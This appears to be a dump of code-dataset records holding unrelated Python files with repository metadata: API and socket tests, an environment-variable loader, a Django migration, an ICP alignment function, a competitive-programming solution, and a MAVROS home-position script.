test_required_props(self): index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: if endpoint not in ["@context", "@id", "@type"]: class_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if class_name not in self.doc.collections: class_ = self.doc.parsed_classes[class_name]["class"] class_methods = [ x.method for x in class_.supportedOperation] if "PUT" in class_methods: dummy_object = gen_dummy_object(class_.title, self.doc) required_prop = "" for prop in class_.supportedProperty: if prop.required: required_prop = prop.title break if required_prop: del dummy_object[required_prop] put_response = self.client.put( endpoints[endpoint], data=json.dumps(dummy_object)) assert put_response.status_code == 400 def test_writeable_props(self): index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: if endpoint not in ["@context", "@id", "@type"]: class_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if class_name not in self.doc.collections: class_ = self.doc.parsed_classes[class_name]["class"] class_methods = [ x.method for x in class_.supportedOperation] if "POST" in class_methods: dummy_object = gen_dummy_object(class_.title, self.doc) # Test for writeable properties post_response = self.client.post( endpoints[endpoint], data=json.dumps(dummy_object)) assert post_response.status_code == 200 # Test for properties with writeable=False non_writeable_prop = "" for prop in class_.supportedProperty: if prop.write is False: non_writeable_prop = prop.title break if non_writeable_prop != "": dummy_object[non_writeable_prop] = "xyz" post_response = self.client.post( endpoints[endpoint], data=json.dumps(dummy_object)) assert post_response.status_code == 405 def test_readable_props(self): index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: if endpoint not in ["@context", "@id", "@type"]: class_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if class_name not in self.doc.collections: class_ = self.doc.parsed_classes[class_name]["class"] class_methods = [ x.method for x in class_.supportedOperation] if "GET" in class_methods: not_readable_prop = "" for prop in class_.supportedProperty: if prop.read is False: not_readable_prop = prop.title break if not_readable_prop: get_response = self.client.get( endpoints[endpoint]) get_response_data = json.loads( get_response.data.decode('utf-8')) assert not_readable_prop not in get_response_data def test_bad_objects(self): """Checks if bad objects are added or not.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: bad_response_put = self.client.put( endpoints[endpoint], data=json.dumps( dict( foo='bar'))) assert bad_response_put.status_code == 400 def test_bad_requests(self): """Checks if bad requests are handled or not.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: collection = self.doc.collections[collection_name]["collection"] class_ = self.doc.parsed_classes[collection.class_.title]["class"] class_methods = [x.method for x in class_.supportedOperation] dummy_object = gen_dummy_object( collection.class_.title, self.doc) initial_put_response = self.client.put( endpoints[endpoint], data=json.dumps(dummy_object)) assert initial_put_response.status_code == 201 response = json.loads( initial_put_response.data.decode('utf-8')) regex = r'(.*)ID (.{36})* (.*)' matchObj = re.match(regex, response["description"]) assert matchObj is not None id_ = matchObj.group(2) if "POST" not in class_methods: dummy_object = gen_dummy_object( collection.class_.title, self.doc) post_replace_response = self.client.post( '{}/{}'.format(endpoints[endpoint], id_), data=json.dumps(dummy_object)) assert post_replace_response.status_code == 405 if "DELETE" not in class_methods: delete_response = self.client.delete( '{}/{}'.format(endpoints[endpoint], id_)) assert delete_response.status_code == 405 def test_Endpoints_Contexts(self): """Test all endpoints contexts are generated properly.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: response_get = self.client.get(endpoints[endpoint]) assert response_get.status_code == 200 context = json.loads( response_get.data.decode('utf-8'))["@context"] response_context = self.client.get(context) response_context_data = json.loads( response_context.data.decode('utf-8')) assert response_context.status_code == 200 assert "@context" in response_context_data class SocketTestCase(unittest.TestCase): """Test Class for socket events and operations.""" @classmethod def setUpClass(self): """Database setup before the tests.""" print("Creating a temporary database...") engine = create_engine('sqlite:///:memory:') Base.metadata.create_all(engine) session = scoped_session(sessionmaker(bind=engine)) self.session = session self.API_NAME = "demoapi" self.page_size = 1 self.HYDRUS_SERVER_URL = "http://hydrus.com/" self.app = app_factory(self.API_NAME) self.socketio = create_socket(self.app, self.session) print("going for create doc") self.doc = doc_maker.create_doc( doc_writer_sample.api_doc.generate(), self.HYDRUS_SERVER_URL, self.API_NAME) test_classes = doc_parse.get_classes(self.doc.generate()) test_properties = doc_parse.get_all_properties(test_classes) doc_parse.insert_classes(test_classes, self.session) doc_parse.insert_properties(test_properties, self.session) print("Classes and properties added successfully.") print("Setting up hydrus utilities... ") self.api_name_util = set_api_name(self.app, self.API_NAME) self.session_util = set_session(self.app, self.session) self.doc_util = set_doc(self.app, self.doc) self.page_size_util = set_page_size(self.app, self.page_size) self.client = self.app.test_client() self.socketio_client = self.socketio.test_client(self.app, namespace='/sync') print("Creating utilities context... ") self.api_name_util.__enter__() self.session_util.__enter__() self.doc_util.__enter__() self.client.__enter__() print("Setup done, running tests...") @classmethod def tearDownClass(self): """Tear down temporary database and exit utilities""" self.client.__exit__(None, None, None) self.doc_util.__exit__(None, None, None) self.session_util.__exit__(None, None, None) self.api_name_util.__exit__(None, None, None) self.session.close() def setUp(self): for class_ in self.doc.parsed_classes: class_title = self.doc.parsed_classes[class_]["class"].title dummy_obj = gen_dummy_object(class_title, self.doc) crud.insert( dummy_obj, id_=str( uuid.uuid4()), session=self.session) # If it's a collection class then add an extra object so # we can test pagination thoroughly. if class_ in self.doc.collections: crud.insert( dummy_obj, id_=str( uuid.uuid4()), session=self.session) # Add two dummy modification records crud.insert_modification_record(method="POST", resource_url="", session=self.session) crud.insert_modification_record(method="DELETE", resource_url="", session=self.session) def test_connect(self): """Test connect event.""" socket_client = self.socketio.test_client(self.app, namespace='/sync') data = socket_client.get_received('/sync') assert len(data) > 0 event = data[0] assert event['name'] == 'connect' last_job_id = crud.get_last_modification_job_id(self.session) assert event['args'][0]['last_job_id'] == last_job_id socket_client.disconnect(namespace='/sync') def test_reconnect(self): """Test reconnect event.""" socket_client = self.socketio.test_client(self.app, namespace='/sync') # Flush data of first connect event socket_client.get_received('/sync') # Client reconnects by emitting 'reconnect' event. socket_client.emit('reconnect', namespace='/sync') # Get update received on reconnecting to the server data = socket_client.get_received('/sync') assert len(data) > 0 # Extract the event information event = data[0] assert event['name'] == 'connect' last_job_id = crud.get_last_modification_job_id(self.session) # Check last job id with last_job_id received by client in the update. assert event['args'][0]['last_job_id'] == last_job_id socket_client.disconnect(namespace='/sync') def test_modification_table_diff(self): """Test 'modification-table-diff' events.""" # Flush old received data at socket client self.socketio_client.get_received('/sync') # Set last_job_id as the agent_job_id agent_job_id = crud.get_last_modification_job_id(self.session) # Add an extra modification record newer than the agent_job_id new_latest_job_id = crud.insert_modification_record(method="POST", resource_url="", session=self.session) self.socketio_client.emit('get_modification_table_diff', {'agent_job_id': agent_job_id}, namespace='/sync') data = self.socketio_client.get_received('/sync') assert len(data) > 0 event = data[0] assert event['name'] == 'modification_table_diff' # Check received event contains data of newly added modification record. assert event['args'][0][0]['method'] == "POST" assert event['args'][0][0]['resource_url'] == "" assert event['args'][0][0]['job_id'] == new_latest_job_id def test_socketio_POST_updates(self): """Test 'update' event emitted by socketio for POST operations.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: if endpoint not in ["@context", "@id", "@type"]: class_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if class_name not in self.doc.collections: class_ = self.doc.parsed_classes[class_name]["class"] class_methods = [ x.method for x in class_.supportedOperation] if "POST" in class_methods: dummy_object = gen_dummy_object(class_.title, self.doc) # Flush old socketio updates self.socketio_client.get_received('/sync') post_response = self.client.post( endpoints[endpoint], data=json.dumps(dummy_object)) assert post_response.status_code == 200 # Get new socketio update update = self.socketio_client.get_received('/sync') assert len(update) != 0 assert update[0]['args'][0]['method'] == "POST" resource_name = update[0]['args'][0]['resource_url'].split('/')[-1] assert resource_name == endpoints[endpoint].split('/')[-1] def test_socketio_DELETE_updates(self): """Test 'update' event emitted by socketio for DELETE operations.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: if endpoint not in ["@context", "@id", "@type"]: class_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if class_name not in self.doc.collections: class_ = self.doc.parsed_classes[class_name]["class"] class_methods = [ x.method for x in class_.supportedOperation] if "DELETE" in class_methods: # Flush old socketio updates self.socketio_client.get_received('/sync') delete_response = self.client.delete( endpoints[endpoint]) assert delete_response.status_code == 200 # Get new update event update = self.socketio_client.get_received('/sync') assert len(update) != 0 assert update[0]['args'][0]['method'] == 'DELETE' resource_name = update[0]['args'][0]['resource_url'].split('/')[-1] assert resource_name == endpoints[endpoint].split('/')[-1] if __name__ == '__main__': message = """ Running tests for the app. Checking if all responses are in proper order. """ unittest.main()
10,272
0
203
c06b33ca0266576dd77b1443051d6971f9e82077
801
py
Python
environment.py
LCBRU/hic_covid
eb5a37339185ed71246235e307a81d91dc91f9ec
[ "MIT" ]
null
null
null
environment.py
LCBRU/hic_covid
eb5a37339185ed71246235e307a81d91dc91f9ec
[ "MIT" ]
null
null
null
environment.py
LCBRU/hic_covid
eb5a37339185ed71246235e307a81d91dc91f9ec
[ "MIT" ]
null
null
null
"""Environment Variables """ import os from dotenv import load_dotenv load_dotenv() HIC_DB_USERNAME = os.environ["HIC_DB_USERNAME"] HIC_DB_PASSWORD = os.environ["HIC_DB_PASSWORD"] HIC_DB_HOST = os.environ["HIC_DB_HOST"] HIC_DB_DATABASE = os.environ["HIC_DB_DATABASE"] MS_SQL_ODBC_DRIVER = os.environ["MS_SQL_ODBC_DRIVER"] MS_SQL_UHL_DWH_HOST = os.environ["MS_SQL_UHL_DWH_HOST"] MS_SQL_UHL_DWH_USER = os.environ["MS_SQL_UHL_DWH_USER"] MS_SQL_UHL_DWH_PASSWORD = os.environ["MS_SQL_UHL_DWH_PASSWORD"] IDENTITY_API_KEY = os.environ["IDENTITY_API_KEY"] IDENTITY_HOST = os.environ["IDENTITY_HOST"] HIC_CONNECTION_STRING = os.environ["HIC_CONNECTION_STRING"] HIC_HOST = os.environ["HIC_HOST"] HIC_USERNAME = os.environ["HIC_USERNAME"] HIC_PASSWORD = os.environ["HIC_PASSWORD"]
30.807692
64
0.781523
"""Environment Variables """ import os from dotenv import load_dotenv load_dotenv() HIC_DB_USERNAME = os.environ["HIC_DB_USERNAME"] HIC_DB_PASSWORD = os.environ["HIC_DB_PASSWORD"] HIC_DB_HOST = os.environ["HIC_DB_HOST"] HIC_DB_DATABASE = os.environ["HIC_DB_DATABASE"] MS_SQL_ODBC_DRIVER = os.environ["MS_SQL_ODBC_DRIVER"] MS_SQL_UHL_DWH_HOST = os.environ["MS_SQL_UHL_DWH_HOST"] MS_SQL_UHL_DWH_USER = os.environ["MS_SQL_UHL_DWH_USER"] MS_SQL_UHL_DWH_PASSWORD = os.environ["MS_SQL_UHL_DWH_PASSWORD"] IDENTITY_API_KEY = os.environ["IDENTITY_API_KEY"] IDENTITY_HOST = os.environ["IDENTITY_HOST"] HIC_CONNECTION_STRING = os.environ["HIC_CONNECTION_STRING"] HIC_HOST = os.environ["HIC_HOST"] HIC_USERNAME = os.environ["HIC_USERNAME"] HIC_PASSWORD = os.environ["HIC_PASSWORD"]
0
0
0
f0682b750b96bf2f312eb6ff9f2bea5aef2c5958
390
py
Python
nbd_app/migrations/0007_alter_socialamenities_hotline_number.py
Kevson102/Nbd-Phoenix
509a9cf026d24827dccc9a5ec67819ecd86fbf03
[ "MIT" ]
null
null
null
nbd_app/migrations/0007_alter_socialamenities_hotline_number.py
Kevson102/Nbd-Phoenix
509a9cf026d24827dccc9a5ec67819ecd86fbf03
[ "MIT" ]
null
null
null
nbd_app/migrations/0007_alter_socialamenities_hotline_number.py
Kevson102/Nbd-Phoenix
509a9cf026d24827dccc9a5ec67819ecd86fbf03
[ "MIT" ]
null
null
null
# Generated by Django 3.2.9 on 2022-01-03 14:32 from django.db import migrations, models
20.526316
47
0.605128
# Generated by Django 3.2.9 on 2022-01-03 14:32 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('nbd_app', '0006_generalposts'), ] operations = [ migrations.AlterField( model_name='socialamenities', name='hotline_number', field=models.BigIntegerField(), ), ]
0
276
23
a68bccebe211588992d72d7335645e18121c4bf1
1,039
py
Python
python/icp.py
nowtechnologies/ridi_imu
2d8a8e54d0491c44de7edac662b101db47ad3cfc
[ "MIT" ]
140
2018-05-27T16:11:40.000Z
2022-03-28T15:49:28.000Z
python/icp.py
nowtechnologies/ridi_imu
2d8a8e54d0491c44de7edac662b101db47ad3cfc
[ "MIT" ]
13
2018-07-16T20:59:58.000Z
2021-12-09T08:35:43.000Z
python/icp.py
nowtechnologies/ridi_imu
2d8a8e54d0491c44de7edac662b101db47ad3cfc
[ "MIT" ]
58
2018-02-14T03:53:51.000Z
2022-03-07T15:59:41.000Z
import numpy as np def fit_transformation(source, target): """ This function computes the best rigid transformation between two point sets. It assumes that "source" and "target" are with the same length and "source[i]" corresponds to "target[i]". :param source: Nxd array. :param target: Nxd array. :return: A transformation as (d+1)x(d+1) matrix; the rotation part as a dxd matrix and the translation part as a dx1 vector. """ assert source.shape == target.shape center_source = np.mean(source, axis=0) center_target = np.mean(target, axis=0) m = source.shape[1] source_zeromean = source - center_source target_zeromean = target - center_target W = np.dot(source_zeromean.T, target_zeromean) U, S, Vt = np.linalg.svd(W) R = np.dot(Vt.T, U.T) if np.linalg.det(R) < 0: Vt[m - 1, :] *= -1 R = np.dot(Vt.T, U.T) t = center_target.T - np.dot(R, center_source.T) T = np.identity(m + 1) T[:m, :m] = R T[:m, m] = t return T, R, t
33.516129
109
0.627526
import numpy as np def fit_transformation(source, target): """ This function computes the best rigid transformation between two point sets. It assumes that "source" and "target" are with the same length and "source[i]" corresponds to "target[i]". :param source: Nxd array. :param target: Nxd array. :return: A transformation as (d+1)x(d+1) matrix; the rotation part as a dxd matrix and the translation part as a dx1 vector. """ assert source.shape == target.shape center_source = np.mean(source, axis=0) center_target = np.mean(target, axis=0) m = source.shape[1] source_zeromean = source - center_source target_zeromean = target - center_target W = np.dot(source_zeromean.T, target_zeromean) U, S, Vt = np.linalg.svd(W) R = np.dot(Vt.T, U.T) if np.linalg.det(R) < 0: Vt[m - 1, :] *= -1 R = np.dot(Vt.T, U.T) t = center_target.T - np.dot(R, center_source.T) T = np.identity(m + 1) T[:m, :m] = R T[:m, m] = t return T, R, t
0
0
0
d22e0e78871a5ab8c68a346843dd049461897cb0
1,887
py
Python
codechef/long-challenge/may21/MODEQ.py
ramanaditya/data-structure-and-algorithms
8dcfeb011e76b2b38b54842e8ccc7a59728141f8
[ "MIT" ]
81
2020-05-22T14:22:04.000Z
2021-12-18T10:11:23.000Z
codechef/long-challenge/may21/MODEQ.py
techhub-community/data-structure-and-algorithms
8dcfeb011e76b2b38b54842e8ccc7a59728141f8
[ "MIT" ]
4
2020-08-06T21:08:00.000Z
2021-03-31T16:07:50.000Z
codechef/long-challenge/may21/MODEQ.py
techhub-community/data-structure-and-algorithms
8dcfeb011e76b2b38b54842e8ccc7a59728141f8
[ "MIT" ]
37
2020-05-22T14:25:21.000Z
2021-12-30T03:13:13.000Z
""" [Modular Equation](https://www.codechef.com/MAY21C/problems/MODEQ) Given integers N and M, find the number of ordered pairs (a,b) such that 1≤a<b≤N and ((M mod a) mod b)=((M mod b) mod a). Input The first line contains an integer T, the number of test cases. Then the test cases follow. The only line of each test case contains two integers N, M. Output For each testcase, output in a single line the answer to the problem. Constraints 1≤T≤1000 2≤N≤106 1≤M≤5⋅105 The sum of N over all test cases does not exceed 106. Note: Multiplier for JAVA for this problem is reduced to 1.25 instead of usual 2. Subtasks Subtask #1 (10 points): 1≤T≤10 2≤N≤103 1≤M≤105 Subtask #2 (40 points): 1≤T≤100 2≤N≤105 1≤M≤105 The sum of N over all test cases does not exceed 106. Subtask #3 (50 points): Original Constraints Sample Input 3 3 5 3 6 3 10 Sample Output 2 3 2 Explanation Test Case 1: The valid pairs are {(1,2),(1,3)}. Test Case 2: The valid pairs are {(1,2),(1,3),(2,3)}. Test Case 3: The valid pairs are {(1,2),(1,3)}. """ import sys # Brute Force """ if __name__ == '__main__': input = sys.stdin.read() data = list(map(int, input.split())) T = data[0] idx = 1 while T > 0: N, M = data[idx: idx + 2] res = 0 for i in range(1, N): for j in range(i + 1, N + 1): if (M % i) % j == (M % j) % i: res += 1 print(res) T -= 1 idx += 2 # Time : 0.58s """ if __name__ == '__main__': T = int(input()) idx = 1 while T > 0: N, M = list(map(int, input().split())) res = 0 mod = dict() for a in range(2, N+1): mod_with_a = M % a res += mod.get(mod_with_a, 1) for b in range(mod_with_a, N+1, a): mod[b] = mod.get(b, 1) + 1 print(res) T -= 1 # Time : 4.92s
19.255102
91
0.569687
""" [Modular Equation](https://www.codechef.com/MAY21C/problems/MODEQ) Given integers N and M, find the number of ordered pairs (a,b) such that 1≤a<b≤N and ((M mod a) mod b)=((M mod b) mod a). Input The first line contains an integer T, the number of test cases. Then the test cases follow. The only line of each test case contains two integers N, M. Output For each testcase, output in a single line the answer to the problem. Constraints 1≤T≤1000 2≤N≤106 1≤M≤5⋅105 The sum of N over all test cases does not exceed 106. Note: Multiplier for JAVA for this problem is reduced to 1.25 instead of usual 2. Subtasks Subtask #1 (10 points): 1≤T≤10 2≤N≤103 1≤M≤105 Subtask #2 (40 points): 1≤T≤100 2≤N≤105 1≤M≤105 The sum of N over all test cases does not exceed 106. Subtask #3 (50 points): Original Constraints Sample Input 3 3 5 3 6 3 10 Sample Output 2 3 2 Explanation Test Case 1: The valid pairs are {(1,2),(1,3)}. Test Case 2: The valid pairs are {(1,2),(1,3),(2,3)}. Test Case 3: The valid pairs are {(1,2),(1,3)}. """ import sys # Brute Force """ if __name__ == '__main__': input = sys.stdin.read() data = list(map(int, input.split())) T = data[0] idx = 1 while T > 0: N, M = data[idx: idx + 2] res = 0 for i in range(1, N): for j in range(i + 1, N + 1): if (M % i) % j == (M % j) % i: res += 1 print(res) T -= 1 idx += 2 # Time : 0.58s """ if __name__ == '__main__': T = int(input()) idx = 1 while T > 0: N, M = list(map(int, input().split())) res = 0 mod = dict() for a in range(2, N+1): mod_with_a = M % a res += mod.get(mod_with_a, 1) for b in range(mod_with_a, N+1, a): mod[b] = mod.get(b, 1) + 1 print(res) T -= 1 # Time : 4.92s
0
0
0
836b1d1ef0eb551fa9e79cfab6310f6344d73c36
1,870
py
Python
invana_bot/manifests/single.py
subhead/invana-bot
c60883986acd1baf279ccbe74dfe06435680fba9
[ "MIT" ]
23
2019-01-31T08:04:39.000Z
2021-12-20T15:55:27.000Z
invana_bot/manifests/single.py
subhead/invana-bot
c60883986acd1baf279ccbe74dfe06435680fba9
[ "MIT" ]
12
2019-02-13T04:59:38.000Z
2021-12-13T20:43:07.000Z
invana_bot/manifests/single.py
subhead/invana-bot
c60883986acd1baf279ccbe74dfe06435680fba9
[ "MIT" ]
4
2019-02-10T18:27:33.000Z
2019-07-12T17:52:36.000Z
import sys import os import yaml class SingleCrawlerManifestManager(object): """ """ required_files = ["spider_manifest.json", "spider_manifest.py"]
35.283019
109
0.661497
import sys import os import yaml class SingleCrawlerManifestManager(object): """ """ required_files = ["spider_manifest.json", "spider_manifest.py"] def __init__(self, config_path=None): print("Setting ETI path as: {}".format(config_path)) self.config_path = config_path def import_files(self): # print("self.manifest_path", self.config_path) self.spider_config = yaml.load(open("{}/spider_manifest.yml".format(self.config_path))) sys.path.append(self.config_path) import spider_transformations self.cti_transformations_module = spider_transformations # print("cti_manifest is {}".format(self.spider_config)) # print("cti_transformations_module is {}".format(self.cti_transformations_module)) def validate_cti_path_and_files(self): errors = [] try: files_in_path = os.listdir(self.config_path) except Exception as e: errors.append("No such path exist {}".format(self.config_path)) files_in_path = [] if errors == 0: for required_file in self.required_files: if required_file not in files_in_path: errors.append("{} file not in the path {}".format(required_file, self.config_path)) return errors def import_cti_transformations(self): for tranformation in self.spider_config.get("transformations", []): method_to_call = getattr(self.cti_transformations_module, tranformation.get("transformation_fn")) tranformation['transformation_fn'] = method_to_call def get_manifest(self): errors = self.validate_cti_path_and_files() if len(errors) > 0: return None, errors self.import_files() self.import_cti_transformations() return self.spider_config, errors
1,569
0
135
ba156beb04b99754b5ff29ec37e1bcc01509b22c
2,838
py
Python
swam/src/mavros_set_home.py
donghee/swam-indoor-flight
bad8adce428e0adacb0f4110ca5739f31a9a11f8
[ "Apache-2.0" ]
null
null
null
swam/src/mavros_set_home.py
donghee/swam-indoor-flight
bad8adce428e0adacb0f4110ca5739f31a9a11f8
[ "Apache-2.0" ]
null
null
null
swam/src/mavros_set_home.py
donghee/swam-indoor-flight
bad8adce428e0adacb0f4110ca5739f31a9a11f8
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python ## # # Send SET_GPS_GLOBAL_ORIGIN and SET_HOME_POSITION messages # ## import rospy from pymavlink.dialects.v10 import ardupilotmega as MAV_APM from mavros.mavlink import convert_to_rosmsg from mavros_msgs.msg import Mavlink class fifo(object): """ A simple buffer """ def send_message(msg, mav, pub): """ Send a mavlink message """ msg.pack(mav) rosmsg = convert_to_rosmsg(msg) pub.publish(rosmsg) print("sent message %s" % msg) def set_global_origin(mav, pub, lat, lon, alt): """ Send a mavlink SET_GPS_GLOBAL_ORIGIN message, which allows us to use local position information without a GPS. """ #target_system = mav.srcSystem target_system = 0 # 0 --> broadcast to everyone lattitude = lat longitude = lon altitude = alt msg = MAV_APM.MAVLink_set_gps_global_origin_message( target_system, lattitude, longitude, altitude) send_message(msg, mav, pub) def set_home_position(mav, pub, lat, lon, alt, _x, _y, _z): """ Send a mavlink SET_HOME_POSITION message, which should allow us to use local position information without a GPS """ target_system = 0 # broadcast to everyone lattitude = lat longitude = lon altitude = alt x = _x y = _y z = _z q = [1, 0, 0, 0] # w x y z approach_x = 0 approach_y = 0 approach_z = 1 msg = MAV_APM.MAVLink_set_home_position_message( target_system, lattitude, longitude, altitude, x, y, z, q, approach_x, approach_y, approach_z) send_message(msg, mav, pub) if __name__=="__main__": rospy.init_node('set_home', anonymous=True) # Global position of the origin lat = 37.4933566 * 1e7 lon = 126.8339491 * 1e7 alt = 200 * 1e3 # x = 3.678 # y = -1.719 # z = 0 x = 0 y = 0 z = 0 set_home(lat, lon, alt, x, y, z)
22.704
76
0.582805
#!/usr/bin/env python ## # # Send SET_GPS_GLOBAL_ORIGIN and SET_HOME_POSITION messages # ## import rospy from pymavlink.dialects.v10 import ardupilotmega as MAV_APM from mavros.mavlink import convert_to_rosmsg from mavros_msgs.msg import Mavlink class fifo(object): """ A simple buffer """ def __init__(self): self.buf = [] def write(self, data): self.buf += data return len(data) def read(self): return self.buf.pop(0) def send_message(msg, mav, pub): """ Send a mavlink message """ msg.pack(mav) rosmsg = convert_to_rosmsg(msg) pub.publish(rosmsg) print("sent message %s" % msg) def set_global_origin(mav, pub, lat, lon, alt): """ Send a mavlink SET_GPS_GLOBAL_ORIGIN message, which allows us to use local position information without a GPS. """ #target_system = mav.srcSystem target_system = 0 # 0 --> broadcast to everyone lattitude = lat longitude = lon altitude = alt msg = MAV_APM.MAVLink_set_gps_global_origin_message( target_system, lattitude, longitude, altitude) send_message(msg, mav, pub) def set_home_position(mav, pub, lat, lon, alt, _x, _y, _z): """ Send a mavlink SET_HOME_POSITION message, which should allow us to use local position information without a GPS """ target_system = 0 # broadcast to everyone lattitude = lat longitude = lon altitude = alt x = _x y = _y z = _z q = [1, 0, 0, 0] # w x y z approach_x = 0 approach_y = 0 approach_z = 1 msg = MAV_APM.MAVLink_set_home_position_message( target_system, lattitude, longitude, altitude, x, y, z, q, approach_x, approach_y, approach_z) send_message(msg, mav, pub) def set_home(lat, lon, alt, x, y, z): try: mavlink_pub = rospy.Publisher("/mavlink/to", Mavlink, queue_size=20) # Set up mavlink instance f = fifo() mav = MAV_APM.MAVLink(f, srcSystem=1, srcComponent=1) # wait to initialize while mavlink_pub.get_num_connections() <= 0: pass for _ in range(5): rospy.sleep(1) set_global_origin(mav, mavlink_pub, lat, lon, alt) set_home_position(mav, mavlink_pub, lat, lon, alt, x, y, z) except rospy.ROSInterruptException: pass if __name__=="__main__": rospy.init_node('set_home', anonymous=True) # Global position of the origin lat = 37.4933566 * 1e7 lon = 126.8339491 * 1e7 alt = 200 * 1e3 # x = 3.678 # y = -1.719 # z = 0 x = 0 y = 0 z = 0 set_home(lat, lon, alt, x, y, z)
674
0
101
c71a1bff4f3192e1d1ec8a670f9e040c334dc954
3,344
py
Python
tests/clims/api/serializers/models/test_process_definition.py
commonlims/commonlims
36a02ed244c7b59ee1f2523e64e4749e404ab0f7
[ "BSD-3-Clause" ]
4
2019-05-27T13:55:07.000Z
2021-03-30T07:05:09.000Z
tests/clims/api/serializers/models/test_process_definition.py
commonlims/commonlims
36a02ed244c7b59ee1f2523e64e4749e404ab0f7
[ "BSD-3-Clause" ]
99
2019-05-20T14:16:33.000Z
2021-01-19T09:25:15.000Z
tests/clims/api/serializers/models/test_process_definition.py
commonlims/commonlims
36a02ed244c7b59ee1f2523e64e4749e404ab0f7
[ "BSD-3-Clause" ]
1
2020-08-10T07:55:40.000Z
2020-08-10T07:55:40.000Z
from __future__ import absolute_import from tests.clims.models.test_substance import SubstanceTestCase from clims.plugins.demo.dnaseq.workflows.sequence import SequenceSimple from clims.api.serializers.models.process_definition import ProcessDefinitionSerializer expected_sequence_simple = { 'id': u'clims.plugins.demo.dnaseq.workflows.sequence.SequenceSimple', 'fields': [{ 'label': u'Comment', 'help': None, 'required': False, 'choices': [], 'type': u'textarea', 'name': u'comment' }, { 'label': u'Sample prep', 'help': u'The method used for preparing the sample', 'required': True, 'choices': ['microwave', 'mixer'], 'type': u'select', 'name': u'sample_prep' }, { 'label': u'Sequencer', 'help': u'Instrument where the sample will be sequenced', 'required': True, 'choices': ['iPhone', 'Android', 'Bang & Olufsen'], 'type': u'select', 'name': u'sequencer' }, { 'label': u'Sample type', 'help': u'The type of the sample', 'required': True, 'choices': ['DNA', 'RNA'], 'type': u'select', 'name': u'sample_type' }], 'presets': [{ 'variables': { 'sample_prep': 'microwave', 'sequencer': 'Android', 'sample_type': 'DNA' }, 'processDefinitionId': 'clims.plugins.demo.dnaseq.workflows.sequence.SequenceSimple', 'name': 'Android: DNA prepared with microwave' }, { 'variables': { 'sample_prep': 'mixer', 'sequencer': 'Android', 'sample_type': 'DNA' }, 'processDefinitionId': 'clims.plugins.demo.dnaseq.workflows.sequence.SequenceSimple', 'name': 'Android: DNA prepared with mixer' }, { 'variables': { 'sample_prep': 'microwave', 'sample_type': 'DNA', 'sequencer': 'iPhone' }, 'processDefinitionId': 'clims.plugins.demo.dnaseq.workflows.sequence.SequenceSimple', 'name': 'iPhone: DNA prepared with microwave' }, { 'variables': { 'sample_prep': 'microwave', 'sequencer': 'Android', 'sample_type': 'RNA' }, 'processDefinitionId': 'clims.plugins.demo.dnaseq.workflows.sequence.SequenceSimple', 'name': 'Android: RNA prepared with microwave' }, { 'variables': { 'sample_prep': 'microwave', 'sample_type': 'DNA', 'sequencer': 'Bang & Olufsen' }, 'processDefinitionId': 'clims.plugins.demo.dnaseq.workflows.sequence.SequenceSimple', 'name': 'Bang & Olufsen: DNA prepared with microwave' }, { 'variables': { 'sample_prep': 'mixer', 'sequencer': 'Android', 'sample_type': 'RNA' }, 'processDefinitionId': 'clims.plugins.demo.dnaseq.workflows.sequence.SequenceSimple', 'name': 'Android: RNA prepared with mixer' }] }
32.466019
87
0.566089
from __future__ import absolute_import from tests.clims.models.test_substance import SubstanceTestCase from clims.plugins.demo.dnaseq.workflows.sequence import SequenceSimple from clims.api.serializers.models.process_definition import ProcessDefinitionSerializer class ProcessDefinitionSerializerTest(SubstanceTestCase): def test_simple(self): process = SequenceSimple() serializer = ProcessDefinitionSerializer(process) assert serializer.data == expected_sequence_simple expected_sequence_simple = { 'id': u'clims.plugins.demo.dnaseq.workflows.sequence.SequenceSimple', 'fields': [{ 'label': u'Comment', 'help': None, 'required': False, 'choices': [], 'type': u'textarea', 'name': u'comment' }, { 'label': u'Sample prep', 'help': u'The method used for preparing the sample', 'required': True, 'choices': ['microwave', 'mixer'], 'type': u'select', 'name': u'sample_prep' }, { 'label': u'Sequencer', 'help': u'Instrument where the sample will be sequenced', 'required': True, 'choices': ['iPhone', 'Android', 'Bang & Olufsen'], 'type': u'select', 'name': u'sequencer' }, { 'label': u'Sample type', 'help': u'The type of the sample', 'required': True, 'choices': ['DNA', 'RNA'], 'type': u'select', 'name': u'sample_type' }], 'presets': [{ 'variables': { 'sample_prep': 'microwave', 'sequencer': 'Android', 'sample_type': 'DNA' }, 'processDefinitionId': 'clims.plugins.demo.dnaseq.workflows.sequence.SequenceSimple', 'name': 'Android: DNA prepared with microwave' }, { 'variables': { 'sample_prep': 'mixer', 'sequencer': 'Android', 'sample_type': 'DNA' }, 'processDefinitionId': 'clims.plugins.demo.dnaseq.workflows.sequence.SequenceSimple', 'name': 'Android: DNA prepared with 